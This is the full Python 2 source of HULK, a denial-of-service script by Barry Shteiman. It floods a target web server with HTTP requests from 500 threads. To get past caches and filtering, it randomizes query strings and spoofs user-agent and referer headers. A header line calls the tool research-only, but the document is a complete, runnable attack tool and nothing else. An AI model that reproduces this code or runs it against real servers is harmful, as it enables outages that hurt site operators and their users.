HULK Attack Script

1. # ----------------------------------------------------------------------------------------------
2. # HULK - HTTP Unbearable Load King
3. #
4. # this tool is a dos tool that is meant to put heavy load on HTTP servers in order to bring them
5. # to their knees by exhausting the resource pool, its is meant for research purposes only
6. # and any malicious usage of this tool is prohibited.
7. #
8. # author : Barry Shteiman , version 1.0
9. # ----------------------------------------------------------------------------------------------
10. import urllib2
11. import sys
12. import threading
13. import random
14. import re
15.  
16. #global params
17. url=''
18. host=''
19. headers_useragents=[]
20. headers_referers=[]
21. request_counter=0
22. flag=0
23. safe=0
24.  
25. def inc_counter():
26. global request_counter
27. request_counter+=1
28.  
29. def set_flag(val):
30. global flag
31. flag=val
32.  
33. def set_safe():
34. global safe
35. safe=1
36.  
37. # generates a user agent array
38. def useragent_list():
39. global headers_useragents
40. headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
41. headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
42. headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
43. headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
44. headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
45. headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
46. headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
47. headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
48. headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
49. headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
50. headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
51. headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
52. return(headers_useragents)
53.  
54. # generates a referer array
55. def referer_list():
56. global headers_referers
57. headers_referers.append('http://www.google.com/?q=')
58. headers_referers.append('http://www.usatoday.com/search/results?q=')
59. headers_referers.append('http://engadget.search.aol.com/search?q=')
60. headers_referers.append('http://' + host + '/')
61. return(headers_referers)
62.  
63. #builds random ascii string
64. def buildblock(size):
65. out_str = ''
66. for i in range(0, size):
67. a = random.randint(65, 90)
68. out_str += chr(a)
69. return(out_str)
70.  
71. def usage():
72. print '---------------------------------------------------'
73. print 'USAGE: python hulk.py <url>'
74. print 'you can add "safe" after url, to autoshut after dos'
75. print '---------------------------------------------------'
76.  
77.  
78. #http request
79. def httpcall(url):
80. useragent_list()
81. referer_list()
82. code=0
83. if url.count("?")>0:
84. param_joiner="&"
85. else:
86. param_joiner="?"
87. request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
88. request.add_header('User-Agent', random.choice(headers_useragents))
89. request.add_header('Cache-Control', 'no-cache')
90. request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
91. request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
92. request.add_header('Keep-Alive', random.randint(110,120))
93. request.add_header('Connection', 'keep-alive')
94. request.add_header('Host',host)
95. try:
96. urllib2.urlopen(request)
97. except urllib2.HTTPError, e:
98. #print e.code
99. set_flag(1)
100. print 'Response Code 500'
101. code=500
102. except urllib2.URLError, e:
103. #print e.reason
104. sys.exit()
105. else:
106. inc_counter()
107. urllib2.urlopen(request)
108. return(code)
109.  
110.  
111. #http caller thread
112. class HTTPThread(threading.Thread):
113. def run(self):
114. try:
115. while flag<2:
116. code=httpcall(url)
117. if (code==500) & (safe==1):
118. set_flag(2)
119. except Exception, ex:
120. pass
121.  
122. # monitors http threads and counts requests
123. class MonitorThread(threading.Thread):
124. def run(self):
125. previous=request_counter
126. while flag==0:
127. if (previous+100<request_counter) & (previous<>request_counter):
128. print "%d Requests Sent" % (request_counter)
129. previous=request_counter
130. if flag==2:
131. print "\n-- HULK Attack Finished --"
132.  
133. #execute
134. if len(sys.argv) < 2:
135. usage()
136. sys.exit()
137. else:
138. if sys.argv[1]=="help":
139. usage()
140. sys.exit()
141. else:
142. print "-- HULK Attack Started --"
143. if len(sys.argv)== 3:
144. if sys.argv[2]=="safe":
145. set_safe()
146. url = sys.argv[1]
147. if url.count("/")==2:
148. url = url + "/"
149. m = re.search('http\://([^/]*)/?.*', url)
150. host = m.group(1)
151. for i in range(500):
152. t = HTTPThread()
153. t.start()
154. t = MonitorThread()
155. t.start()